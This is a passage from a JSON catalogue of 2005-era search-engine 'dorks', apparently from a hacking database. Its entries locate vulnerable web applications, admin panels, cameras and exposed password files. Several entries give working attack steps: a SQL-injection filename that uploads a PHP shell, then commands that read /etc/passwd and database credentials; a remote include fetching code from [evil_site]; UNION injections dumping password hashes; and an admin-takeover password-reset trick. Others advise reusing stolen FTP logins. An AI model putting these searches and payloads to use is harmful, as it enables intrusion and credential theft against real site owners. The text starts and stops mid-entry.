way the forum checks attachment extensions...look at the vulnerable code at viewforum.php 256-272 lines.nothing seems so strange, but... what happen if you try to upload a filewith this name? :shell.php.' or 'a' ='a;)[1] SQL INJECTION!The query and other queries like this become:SELECT * FROM [extensions table name] WHERE extension='' or 'a' ='a' AND file_type='Image'you have bypassed the check... now an executable file is uploaded, because for Apache, bothon Windows and Linux a file with that name is an executable php file...you can download a poc file from my site, at url:http://rgod.altervista.org/shell.zipinside we have:you can do test manually, unzip the file, register, login, post this file as attachment, thengo to this url to see the directory where the attachment has been uploaded:http://[target]/[path]/viewattach.phpyou will be redirected to:http://[target]/[path]/[upload_dir]/then launch commands:http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20/etc/passwdto see /etc/passwd filehttp://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20./../db_config.incto see database username and passwordand so on...you can see my poc exploit at this url:http://www.rgod.altervista.org/class1.htmlgoogledork: \"Powered by and copyright class-1\"rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta . it", "submited": "2005-09-08", "request": "\"Powered by and copyright class-1\"  0.24.4", "id": 1095}, {"short description": "\"Powered by Xcomic\"", "long description": "\"Powered by xcomic\"this is a recent exploit, you can retrieve any file on target systemby using \"../\" chars and null byte (%00), example:http://target/path_to_xcomic/initialize.php?xcomicRootPath=../../../../etc/passwd%00or launch commands:http://target/path_to_xcomic/initiailze.php?xcomicRootPath=http://[evil_site]/cmd.gif?command=ls%20-la%00where cmd.gif is a file like this:I have read an advisory copy here: http://forum.ccteam.ru/archive/index.php/t-57.html", "submited": "2005-09-08", "request": "\"Powered by Xcomic\"", "id": 1096}, {"short description": "rdbqds -site:.edu -site:.mil -site:.gov", "long description": "Ceasar encryption is a rather simple encryption. You simply shift letters up or down across the entire length of the message... In the url I did this with the word \"secret\" which equals rdbqds.. (1 char shift).It appears that protected PDF documents use this very encryption to protect its documents. At least one version of adobe acrobat did. A big thank you to Golfo for the links he provided in the forum to assist.http://www.math.cankaya.edu.tr/~a.kabarcik/decrypt.html http://www.math.cankaya.edu.tr/~a.kabarcik/encrypt.html", "submited": "2005-09-08", "request": "rdbqds -site:.edu -site:.mil -site:.gov", "id": 1097}, {"short description": "\"Warning:\" \"Cannot execute a blank command in\"", "long description": "\"Warning: passthru(): Cannot execute a blank command in\" \"Warning: system(): Cannot execute a blank command in\" \"Warning: exec(): Cannot execute a blank command in\" generally: \"Warning:\" \"Cannot execute a blank command in\" this a php error message, essentially it shows hacked pages links where someone leaved a backdoor and the page has error_reporting not set to 0... you can execute shell commands simply appending a var, guessing variable name, usually 'cmd' or 'command' or something else, example: http://[target]/[path]/somescript.php?cmd=cat%20/etc/passwd", "submited": "2005-09-11", "request": "\"Warning:\" \"Cannot execute a blank command in\"", "id": 1098}, {"short description": "\"Mail-it Now!\" intitle:\"Contact form\" | inurl:contact.php", "long description": "Mail-it Now! 1.5 (possibly prior versions) contact.php remote code executionsite: http://www.skyminds.net/source/description: a mail form scriptvulnerability: unsecure file creation -&gt; remote code executionwhen you post an attachment and upload it to the server (usually to \"./upload/\" dir )the script rename the file in this way:[time() function result] + [-] + [filename that user choose]spaces are simply replaced with \"_\" chars.So a user can post an executable attachment, calculate the time() result locallythen, if attachment is a file like this:can launch commands on target system, example:http://[target]/[path]/[time() result]-[filename.php]?command=cat%20/etc/passwdu can find my poc code at this url: http://rgod.altervista.org/mailitnow.html", "submited": "2005-09-11", "request": "\"Mail-it Now!\" intitle:\"Contact form\" | inurl:contact.php", "id": 1099}, {"short description": "\"maxwebportal\" inurl:\"default\" \"snitz forums\" +\"homepage\" -intitle:maxwebportal", "long description": "several vulnerabilities relating to this.MaxWebPortal is a web portal and online community system which includes features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. User interface allows members to add news, content, write reviews and share information among other registered users.h**p://www.maxwebportal.com/", "submited": "2005-09-13", "request": "\"maxwebportal\" inurl:\"default\" \"snitz forums\" +\"homepage\" -intitle:maxwebportal", "id": 1100}, {"short description": "\"Powered by AzDg\" (2.1.3 | 2.1.2 | 2.1.1)", "long description": "AzDGDatingLite V 2.1.3 (possibly prior versions) remote code execution software: site: http://www.azdg.com/ download page: http://www.azdg.com/scripts.php?l=english description:\" AzDGDatingLite is a Free dating script working on PHP and MySQL. Multilanguage, Multitemplate, quick/simple search, feedback with webmaster, Admin maillist, Very customizable \" etc.   vulnerability: look at the vulnerable code in ./include/security.inc.php at lines ~80-90 ... else    {    if (isset($l) &amp;&amp; file_exists(C_PATH.'/languages/'.$l.'/'.$l.'.php') &amp;&amp; $l != '')       {               include_once C_PATH.'/languages/'.$l.'/'.$l.'.php';          include_once C_PATH.'/languages/'.$l.'/'.$l.'_.php';    } ... you can include arbitrary file on the server using \"../\" and null byte (%00) (to truncate path to the filename you choose), example: http://[target]/[path]/azdg//include/security.inc.php?l=../../../../../../../[filename.ext]%00 at the begin of the script we have: @ob_start(); look at the php ob_ start man page : \"This function will turn output buffering on. While output buffering is active no output is sent from the script (other than headers), instead the output is stored in an internal buffer.\" However, this is not a secure way to protect a script: buffer is never showned, so you cannot see arbitrary file from the target machine this time ... but you can execute arbirtrary commands and after to see any file :) : when you register to azdg you can upload photos, so you can upload and include a gif or jpeg file like this:  usually photos are uploaded to ./members/uploads/[subdir]/[newfilename].[ext] azdg calculates [subdir] &amp; [newfilename] using date(), time() and rand() functions you cannot calculate but you can retrieve the filename from azdg pages when file is showned on screen (!), so you can do this: http://[target]/[path]/azdg//include/security.inc.php?l=../../../members/uploads/[subdir]/[filename.ext]%00&amp;cmd=cat%20/etc/passwd the output will be redirected to ./include/temp.txt so you make a GET request of this file and you have /etc/passwd file you can find my poc exploit at this url:http://rgod.altervista.org/azdg.html", "submited": "2005-09-13", "request": "\"Powered by AzDg\" (2.1.3 | 2.1.2 | 2.1.1)", "id": 1101}, {"short description": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "long description": "iCMS - Content Management System...Create dynamic interactive websites in minutes without knowing HTML or web programming. iCMS is a perfect balance of ease of use, flexibility, and power. If you are a Web Developer, you can dramatically decrease your Website development time, decrease your costs and deliver a product that will yield higher profits with less maintenance required!Dont think there are any vulns attached to this", "submited": "2005-09-13", "request": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "id": 1102}, {"short description": "\"Powered by: Land Down Under 800\" |  \"Powered by: Land Down Under 801\" - www.neocrome.net", "long description": "Land Down Under is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.http://secunia.com/advisories/16878/", "submited": "2005-09-13", "request": "\"Powered by: Land Down Under 800\" |  \"Powered by: Land Down Under 801\" - www.neocrome.net", "id": 1103}, {"short description": "intext:\"Master Account\"  \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "long description": "There seems to be several vulns for qmail.", "submited": "2005-09-13", "request": "intext:\"Master Account\"  \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "id": 1104}, {"short description": "\"powered by Gallery v\" \"[slideshow]\"|\"images\" inurl:gallery", "long description": "There is a script injection vuln for all versions.http://www.securityfocus.com/bid/14668", "submited": "2005-09-13", "request": "\"powered by Gallery v\" \"[slideshow]\"|\"images\" inurl:gallery", "id": 1105}, {"short description": "intitle:guestbook inurl:guestbook \"powered by  Advanced guestbook 2.*\" \"Sign the Guestbook\"", "long description": "Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.http://secunia.com/product/4356/http://www.packetalarm.com/sec_notices/index.php?id=2209&amp;delimit=1#detail", "submited": "2005-09-13", "request": "intitle:guestbook inurl:guestbook \"powered by  Advanced guestbook 2.*\" \"Sign the Guestbook\"", "id": 1106}, {"short description": "intitle:\"Backup-Management (phpMyBackup v.0.4 beta * )\" -johnny.ihackstuff", "long description": "phpMyBackup is an mySQL backup tool, with features like copying backups to a different server using FTP.", "submited": "2005-09-13", "request": "intitle:\"Backup-Management (phpMyBackup v.0.4 beta * )\" -johnny.ihackstuff", "id": 1107}, {"short description": "\"Powered by Monster Top List\" MTL numrange:200-", "long description": "2 Step dork - Change url to add filename \"admin.php\" (just remove index.php&amp;stuff=1&amp;me=2 if you have to) for the admin login.This search finds more pages rather than focusing on the admin login page itself, thus the 2 step dork is more effective.", "submited": "2005-09-13", "request": "\"Powered by Monster Top List\" MTL numrange:200-", "id": 1108}, {"short description": "\"login prompt\" inurl:GM.cgi", "long description": "GreyMatter is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.", "submited": "2005-09-13", "request": "\"login prompt\" inurl:GM.cgi", "id": 1109}, {"short description": "\"e107.org 2002/2003\" inurl:forum_post.php?nt", "long description": "e107 is prone to an input validation vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.Successful exploitation of this issue will permit an attacker to create arbitrary forum message posts.http://www.securityfocus.com/bid/14699", "submited": "2005-09-13", "request": "\"e107.org 2002/2003\" inurl:forum_post.php?nt", "id": 1110}, {"short description": "filetype:dat inurl:Sites.dat", "long description": "If you want to find out FTP passwords from FlashFXP Client, just type this query in google and you'll find files called Sites.dat which contain ftp sites, usernames and passwords. If you want to use it, just install FlashFXP and copy whole section to your sites.dat file (file is in your flashFXP directory).", "submited": "2005-09-13", "request": "filetype:dat inurl:Sites.dat", "id": 1111}, {"short description": "intext:\"enable password 7\"", "long description": "some people are that stupid to keep their Cisco routers config files on site. You can easly find out configs and password alog with IP addresses of this devices. Above string let you find weak passwords, which are encrypted but can be decrypted by free tool called GetPass and provided by boson.com", "submited": "2005-09-13", "request": "intext:\"enable password 7\"", "id": 1112}, {"short description": "\"Copyright 2004 Digital Scribe v.1.4\"", "long description": "Digital Scribe v1.4 Login Bypass / SQL injection / remote code executionsoftware site: http://www.digital-scribe.org/description: \"Teachers have full control through a web-based interface. Designedfor easy installation and even easier use, the  Digital Scribe  has been used in thousands of  schools. No teacher  or IT Personnel  needs to  know any  computer languages in order to install and use this intuitive system.rgodsite: http://rgod.altervista.orgemail: retrogod at aliceposta it", "submited": "2005-09-15", "request": "\"Copyright 2004 Digital Scribe v.1.4\"", "id": 1113}, {"short description": "\"you can now password\" | \"this is a special page only seen by you. your profile visitors\"  inurl:imchaos", "long description": "IMchaos link tracker admin pages. Reveals AIM screennames, IP ADDRESSES AND OTHER INFO via details link. Logs can also be viewed and deleted from this page.", "submited": "2005-09-15", "request": "\"you can now password\" | \"this is a special page only seen by you. your profile visitors\"  inurl:imchaos", "id": 1114}, {"short description": "XOOPS Custom Installation", "long description": "XOOPS custom installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations via pre-filled form data.", "submited": "2005-09-16", "request": "XOOPS Custom Installation", "id": 1115}, {"short description": "intitle:\"netbotz appliance\" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces", "long description": "Netbotz devices are made to monitor video, temperature, electricity and door access in server rooms. These systems usually have multiple cameras. The information by itself might not be very dangerous, but someone could use it to plan physical entrance to a server room. This is not good information to have publicly available.", "submited": "2005-09-16", "request": "intitle:\"netbotz appliance\" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces", "id": 1116}, {"short description": "\"Powered by PHP Advanced Transfer Manager\"", "long description": "PHP Advanced Transfer Manager v1.30 underlying system disclosure / remote command execution / cross site scriptingrgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta it", "submited": "2005-09-17", "request": "\"Powered by PHP Advanced Transfer Manager v1.30\"", "id": 1117}, {"short description": "\"Welcome to Administration\" \"General\" \"Local Domains\" \"SMTP Authentication\" inurl:admin", "long description": "This reveals admin site for Argo Software Design Mail Server.", "submited": "2005-09-17", "request": "\"Welcome to Administration\" \"General\" \"Local Domains\" \"SMTP Authentication\" inurl:admin", "id": 1118}, {"short description": "\"Powered by CuteNews\"", "long description": "CuteNews 1.4.0 (possibly prior versions) remote code executionsoftware site: http://cutephp.com/description: \"Cute news is a powerful and easy for using news management system that use flat files to store its database. It supports comments, archives, search function, image uploading, backup function, IP banning, flood protection ...\"rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta it", "submited": "2005-09-17", "request": "\"Powered by CuteNews\"", "id": 1119}, {"short description": "intitle:rapidshare intext:login", "long description": "Rapidshare login passwords.", "submited": "2005-09-18", "request": "intitle:rapidshare intext:login", "id": 1120}, {"short description": "intitle:\"PHProjekt - login\" login password", "long description": "PHProjekt is a group managing software for online calenders, chat, forums, etc.  I looked around and i think the default admin login/pass is root/root. Results 1 - 23 of about 851 when i posted this", "submited": "2005-09-21", "request": "intitle:\"PHProjekt - login\" login password", "id": 1121}, {"short description": "Phaser numrange:100-100000 Name DNS IP \"More Printers\" index help filetype:html | filetype:shtml", "long description": "This is a search for various phaser network printers.  With this search you can look for printers to print test/help pages, monitor the printer, and generally mess with people.", "submited": "2005-09-21", "request": "Phaser numrange:100-100000 Name DNS IP \"More Printers\" index help filetype:html | filetype:shtml", "id": 1122}, {"short description": "intitle:\"Orite IC301\" | intitle:\"ORITE Audio IP-Camera IC-301\" -the -a", "long description": "This search finds orite 301 netcams with audio capabilities.", "submited": "2005-09-21", "request": "intitle:\"Orite IC301\" | intitle:\"ORITE Audio IP-Camera IC-301\" -the -a", "id": 1123}, {"short description": "\"Powered by GTChat 0.95\"+\"User Login\"+\"Remember my login information\"", "long description": "There is a (adduser) remote denial of service vulnerabilty on version 0.95", "submited": "2005-09-23", "request": "\"Powered by GTChat 0.95\"+\"User Login\"+\"Remember my login information\"", "id": 1124}, {"short description": "http://www.google.com/search?q=intitle:%22WEB//NEWS+Personal+Newsmanagement%22+intext:%22%C2%A9+2002-2004+by+Christian+Scheb+-+Stylemotion.de%22%2B%22", "long description": "WEB//NEWS 1.4 is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.", "submited": "2005-09-23", "request": "intitle:\"WEB//NEWS Personal Newsmanagement\" intext:\"2002-2004 by Christian Scheb - Stylemotion.de\"+\"Version 1.4 \"+\"Login\"", "id": 1125}, {"short description": "inurl:/modcp/ intext:Moderator+vBulletin", "long description": "there have been several dorks for vBulletin, but I could not find one in the search that targets the moderators control panel login page - this search targets versions 3.0 onwards.", "submited": "2005-09-23", "request": "inurl:/modcp/ intext:Moderator+vBulletin", "id": 1126}, {"short description": "intitle:\"i-secure v1.1\" -edu", "long description": "I-Secure Login Pages", "submited": "2005-09-23", "request": "intitle:\"i-secure v1.1\" -edu", "id": 1127}, {"short description": "intitle:\"Login to the forums - @www.aimoo.com\" inurl:login.cfm?id=", "long description": "Aimoo Login Pages. \"Looking for a free message board solution? Aimoo provides one of the most powerful, feature rich, community based forum services available!\"", "submited": "2005-09-23", "request": "intitle:\"Login to the forums - @www.aimoo.com\" inurl:login.cfm?id=", "id": 1128}, {"short description": "intitle:\"Login Forum Powered By AnyBoard\" intitle:\"If you are a new user:\" intext:\"Forum Powered By AnyBoard\" inurl:gochat -edu", "long description": "Anyboard Login Portals. In addition,A vulnerability has been reported in Netbula Anyboard 9.x \"that may allow a remote attacker to gain access to sensitive data. This problem is due to an information disclosure issue that can be triggered by an attacker sending specific HTTP requests to a vulnerable host. This will result in sensitive information about the system being revealed to the attacker.\"", "submited": "2005-09-23", "request": "intitle:\"Login Forum Powered By AnyBoard\" intitle:\"If you are a new user:\" intext:\"Forum Powered By AnyBoard\" inurl:gochat -edu", "id": 1129}, {"short description": "\"Mimicboard2 086\"+\"2000 Nobutaka Makino\"+\"password\"+\"message\" inurl:page=1", "long description": "Mimicboard2 is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.", "submited": "2005-09-23", "request": "\"Mimicboard2 086\"+\"2000 Nobutaka Makino\"+\"password\"+\"message\" inurl:page=1", "id": 1130}, {"short description": "\"your password is\" filetype:log", "long description": "This search finds log files containing the phrase (Your password is). These files often contain plaintext passwords, although YMMV.", "submited": "2005-09-24", "request": "\"your password is\" filetype:log", "id": 1131}, {"short description": "\"admin account info\" filetype:log", "long description": "searches for logs containing admin server account information such as username and password.", "submited": "2005-09-25", "request": "\"admin account info\" filetype:log", "id": 1132}, {"short description": "\"Warning: Supplied argument is not a valid File-Handle resource in\"", "long description": "This error message cqan reveal path information. This message (like other error messages) is often posted to help forums, although the message still reveals path info in this form. Consider using the site: operator to narrow search.", "submited": "2005-09-25", "request": "\"Warning: Supplied argument is not a valid File-Handle resource in\"", "id": 1133}, {"short description": "\"Maintained with Subscribe Me 2.044.09p\"+\"Professional\" inurl:\"s.pl\"", "long description": "subscribe Me Pro 2.0.44.09p is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.http://www.securityfocus.com/bid/14817/exploit", "submited": "2005-09-25", "request": "\"Maintained with Subscribe Me 2.044.09p\"+\"Professional\" inurl:\"s.pl\"", "id": 1134}, {"short description": "\"Warning:\" \"SAFE MODE Restriction in effect.\" \"The script whose uid is\" \"is not allowed to access owned by uid 0 in\" \"on line\"", "long description": "This error message reveals full path information. Recommend use of site: operator to narrow searches.", "submited": "2005-09-25", "request": "\"Warning:\" \"SAFE MODE Restriction in effect.\" \"The script whose uid is\" \"is not allowed to access owned by uid 0 in\" \"on line\"", "id": 1135}, {"short description": "intitle:\"Admin Login\" \"admin login\" \"blogware\"", "long description": "Blogware Login Portal: \"An exciting and innovative tool for creating or enhancing your web presence. It is your key to easy publishing on the World Wide Web share pictures, video, links, documents, newsletters, opinions and more, with family, friends and colleagues. Now you can have a website without being a Webmaster. It's simple! There is no HTML to learn and no new software to download and install.\"", "submited": "2005-09-25", "request": "intitle:\"Admin Login\" \"admin login\" \"blogware\"", "id": 1136}, {"short description": "intitle:\"net2ftp\" \"powered by net2ftp\" inurl:ftp OR intext:login OR inurl:login", "long description": "net2ftp is a web-based FTP client written in PHP. Lets explain this in detail. Web-based means that net2ftp runs on a web server, and that you use a browser (for example Internet Explorer or Mozilla)", "submited": "2005-09-25", "request": "intitle:\"net2ftp\" \"powered by net2ftp\" inurl:ftp OR intext:login OR inurl:login", "id": 1137}, {"short description": "inurl:cartwiz/store/index.asp", "long description": "The CartWIZ eCommerce Shopping Cart System will help you build your online store through an interactive web-based e-commerce administration interface.There are, multiple sql injection and xss in cartwiz asp cart.http://neworder.box.sk/explread.php?newsid=13534", "submited": "2005-09-25", "request": "inurl:cartwiz/store/index.asp", "id": 1138}, {"short description": "intitle:\"Control panel\" \"Control Panel Login\" ArticleLive inurl:admin -demo", "long description": "Build, manage and customize your own search engine friendly news / article site from scratch -- with absolutely no technical experience.Authentication bypass, sql injections and xss in ArticleLive 2005http://neworder.box.sk/explread.php?newsid=13582", "submited": "2005-09-25", "request": "intitle:\"Control panel\" \"Control Panel Login\" ArticleLive inurl:admin -demo", "id": 1139}, {"short description": "\"Powered by autolinks pro 2.1\" inurl:register.php", "long description": "AutoLinksPro is a linking solution. AutoLinksPro link exchange software was built for the search engines to help improve your search engine rankings, traffic, and sales.Remote PHP File Include Vulnerabilityhttp://www.securityfocus.com/archive/1/409529/30/120/threaded", "submited": "2005-09-25", "request": "\"Powered by autolinks pro 2.1\" inurl:register.php", "id": 1140}, {"short description": "\"CosmoShop by Zaunz Publishing\" inurl:\"cgi-bin/cosmoshop/lshop.cgi\" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*", "long description": "cosmoshop is a comercial shop system written as a CGI.vulnerabilities:sql injection, passwords saved in cleartext, view any filehttp://www.securityfocus.com/archive/1/409510/30/120/threaded", "submited": "2005-09-25", "request": "\"CosmoShop by Zaunz Publishing\" inurl:\"cgi-bin/cosmoshop/lshop.cgi\" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*", "id": 1141}, {"short description": "\"Powered by Woltlab Burning Board\" -\"2.3.3\" -\"v2.3.3\" -\"v2.3.2\" -\"2.3.2\"", "long description": "It's an exact replica of vbulletin but it is free.SQL-Injection Exploit:http://www.governmentsecurity.org/archive/t14850.html", "submited": "2005-09-25", "request": "\"Powered by Woltlab Burning Board\" -\"2.3.3\" -\"v2.3.3\" -\"v2.3.2\" -\"2.3.2\"", "id": 1142}, {"short description": "\"Please login with admin pass\" -\"leak\" -sourceforge", "long description": "PHPsFTPd is a web based administration and configuration interface for the SLimFTPd ftp serverIt can be used an any http server that suports PHP and does not need a database or adittional php modules, only SlimFTPD It allows the administrators of the ftp server to configurate it from within this interface as opposed to its native ascii conf.file It shows statistics about the users that accesed the server , the files that were downloaded , server breakdowns etcAdmin password leak:http://cert.uni-stuttgart.de/archive/bugtraq/2005/07/msg00209.html", "submited": "2005-09-25", "request": "\"Please login with admin pass\" -\"leak\" -sourceforge", "id": 1143}, {"short description": "intitle:\"PHP TopSites FREE Remote Admin\"", "long description": "PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.PHP TopSites Discloses Configuration Data to Remote Users:http://www.securitytracker.com/alerts/2005/Jul/1014552.htmlPS: all versions are vulnerable at time of writing.", "submited": "2005-09-25", "request": "intitle:\"PHP TopSites FREE Remote Admin\"", "id": 1144}, {"short description": "intitle:\"iDevAffiliate - admin\" -demo", "long description": "Affiliate Tracking Software \tAdding affiliate tracking software to your site is one of the most effective ways to achieve more  sales and more traffic!  Our affiliate software installs in just minutes and integrates easily intoyour existing website.", "submited": "2005-09-25", "request": "intitle:\"iDevAffiliate - admin\" -demo", "id": 1145}, {"short description": "\"powered by my little forum\"", "long description": "My Little Forum 1.5 / 1.6beta SQL Injectionsoftware:site: http://www.mylittlehomepage.net/my_little_forumsoftware: \"A simple web-forum that supports classical thread view (message tree)as well as messagebord view to display the messages.Requires PHP &gt; 4.1 and a MySQL database.\"1) look at the vulnerable code at line 144 inside search.php:... $result = mysql_query(\"SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL \". $time_difference.\" HOUR,'\".$lang['time_format'].\"') AS Uhrzeit, DATE_FORMAT(time + INTERVAL \".$time_difference.\" HOUR, '\".$lang['time_format'].\"') AS Datum, subject, name, email, hp, place, text, category FROM \".$forum_table.\" WHERE \".$search_string.\" ORDER BY tid DESC, time ASC LIMIT \".$ul.\", \" .$settings['search_results_per_page'], $connid);...now goto the search page, select \"phrase\", and type:[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name='[username]' /*if magic quotes are off you will have (guess?...) any admin/user password hash'cause $searchstring var is not filtered...u can fin my poc exploit here:http://rgod.altervista.org/mylittle15_16b.html2) 1.6beta is vulnerable even, we have:...$result = mysql_query(\"SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL \".$time_difference.\" HOUR) ASUhrzeit, subject, name, email, hp, place, text, category FROM \".$db_settings['forum_table'].\"WHERE \".$search_string.\" ORDER BY tid DESC, time ASC LIMIT \".$ul.\", \".$settings['search_results_per_page'],$connid);...you have same results, deleting a statement in injection string:[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name='[username]' /*", "submited": "2005-09-26", "request": "\"powered by my little forum\"", "id": 1146}, {"short description": "\"powered by mailgust\"", "long description": "MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takevorsoftware:site: http://www.mailgust.org/description:Mailgust is three softwares in one: * Mailing list manager * Newsletter distribution tool * Message Board Mailgust is written in php and uses a mysql database. vulnerability:if magic quotes off -&gt; SQL Injectionwithout to have an account, a user can send himself a new admin password usingpassword reminder, in email field type:[yuor_email],'or'a'='a'/*@hotmail.comgive a look to what happen:220 [MAILSERVER] SMTP Service readyHELO [MAILGUST]250  [MAILSERVER].MAIL FROM:250 MAIL FROM: OKRCPT TO:250 RCPT TO:&gt;[your_email] OKRCPT TO: OKDATA354 Start mail input; end with .Date: Sat, 24 Sep 2005 16:11:38 +0100Subject: New passwordTo: [your_email],'or'a'='a'/*@hotmail.comFrom: systemxxx@localhost.comYour login name is: [admin_email]Your new password is: 4993587Click here:http://localhost/mailgust/index.php?method=activate_new_password&amp;list=maillistuser&amp;pwd=4993587&amp;id=1756185114to activate the password, than try to log in!It is recommended that you change your password afterwards..250  Mail acceptedQUIT221 [MAILSERVER] QUITvulnerable query is in [path_to_mailgust]/gorum/user_email.php at line 363:...$query = \"SELECT * FROM $applName\".\"_$userClassName \".             \"WHERE email='$this-&gt;email'\";...it becomes:SELECT * FROM maillist_maillistuser WHERE email='[yuor_email],'or'a'='a'/*@hotmail.com'\"or'a'='a'\" is always true, so the query is always true, script doesn't fail, for mail function, theese are two valid email address,it will send the mail to [your_email] and to 'or'a'='a'/*@hotmail.com ;)activate the password, now you can login with [admin_email] as user and new passwordu can find my poc exploit here:http://rgod.altervista.org/maildisgust.html", "submited": "2005-09-26", "request": "\"powered by mailgust\"", "id": 1147}, {"short description": "intitle:\"Folder Listing\" \"Folder Listing\" Name Size Date/Time File Folder", "long description": "directory listing for Fastream NETFile Web Server", "submited": "2005-09-26", "request": "intitle:\"Folder Listing\" \"Folder Listing\" Name Size Date/Time File Folder", "id": 1148}, {"short description": "\"Directory Listing for\" \"Hosted by Xerver\"", "long description": "directory listing for Xerver web server", "submited": "2005-09-26", "request": "\"Directory Listing for\" \"Hosted by Xerver\"", "id": 1149}, {"short description": "intitle:\"Supero Doctor III\" -inurl:supermicro", "long description": "\"Supero Doctor III Remote Management\" by Supermicro, Inc.info: http://www.supermicro.es/products/accessories/software/SuperODoctorIII.htmljust look for default password...", "submited": "2005-09-26", "request": "intitle:\"Supero Doctor III\" -inurl:supermicro", "id": 1150}, {"short description": "intitle:\"Netcam\" intitle:\"user login\"", "long description": "just yet other online cam.", "submited": "2005-09-26", "request": "intitle:\"Netcam\" intitle:\"user login\"", "id": 1151}, {"short description": "Powered by PHP-Fusion v6.00.109 2003-2005. -php-fusion.co.uk", "long description": "this is the dork: Powered by PHP-Fusion 2003-2005. -php-fusion.co.ukas it is, without quotes, for the version I tested, prone toSQL Injection / administrative credentials disclosurethis my advisory/poc exploit: http://rgod.altervista.org/phpfusion600109.html", "submited": "2005-09-28", "request": "Powered by PHP-Fusion v6.00.109 2003-2005. -php-fusion.co.uk", "id": 1152}, {"short description": "inurl:/yabb/Members/Admin.dat", "long description": "This search will show you the Administrator password (very first line) on YaBB forums whose owners didnt configure the permissions correctly. Go up a directory to get a full memberlist (the .dat files have the passwords).", "submited": "2005-09-28", "request": "inurl:/yabb/Members/Admin.dat", "id": 1153}, {"short description": "intitle:\"Biromsoft WebCam\" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000", "long description": "Brimsoft webcam software enables anyone with a webcam to easily create a webcam http server.  This googledork looks for these webcam servers.", "submited": "2005-09-29", "request": "intitle:\"Biromsoft WebCam\" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000", "id": 1154}, {"short description": "(intitle:\"VisionGS Webcam Software\")|(intext:\"Powered by VisionGS Webcam\") -showthread.php -showpost.php -\"Search Engine\" -computersglobal.com -site:g", "long description": "I don't know if the google query got submitted right because it looks truncated.  here it is again:(intitle:\"VisionGS Webcam Software\")|(intext:\"Powered by VisionGS Webcam\") -showthread.php -showpost.php -\"Search Engine\" -computersglobal.com -site:golb.org -site:chat.ru -site:findlastminute.de -site:tricus.de -site:urlaubus.de -johnny.ihackstuff VisionGS webcam software enables anyone with a webcam to easily host a webcam http server.  This dork finds those servers.", "submited": "2005-09-29", "request": "(intitle:\"VisionGS Webcam Software\")|(intext:\"Powered by VisionGS Webcam\") -showthread.php -showpost.php -\"Search Engine\" -computersglobal.com -site:g", "id": 1155}, {"short description": "\"Powered By: lucidCMS 1.0.11\"", "long description": "Lucid CMS 1.0.11 SQL Injection /Login bypassthis is the dork for ther version I tested:\"Powered By: lucidCMS 1.0.11\"advisory/poc exploit:http://rgod.altervista.org/lucidcms1011.htmlwe have an XSS even:http://packetstorm.linuxsecurity.com/0509-exploits/lucidCMS.txt", "submited": "2005-09-29", "request": "\"Powered By: lucidCMS 1.0.11\"", "id": 1156}, {"short description": "\"News generated by Utopia News Pro\" | \"Powered By: Utopia News Pro\"", "long description": "Utopia News Pro 1.1.3 (and prior versions) SQL Injection &amp; XSSadvisory &amp; poc exploit:http://rgod.altervista.org/utopia113.html", "submited": "2005-10-06", "request": "\"News generated by Utopia News Pro\" | \"Powered By: Utopia News Pro\"", "id": 1157}, {"short description": "inurl:login.jsp.bak", "long description": "JSP programmer anyone? You can read this!", "submited": "2005-09-30", "request": "inurl:login.jsp.bak", "id": 1158}, {"short description": "intitle:Mantis \"Welcome to the bugtracker\" \"0.15 | 0.16 | 0.17 | 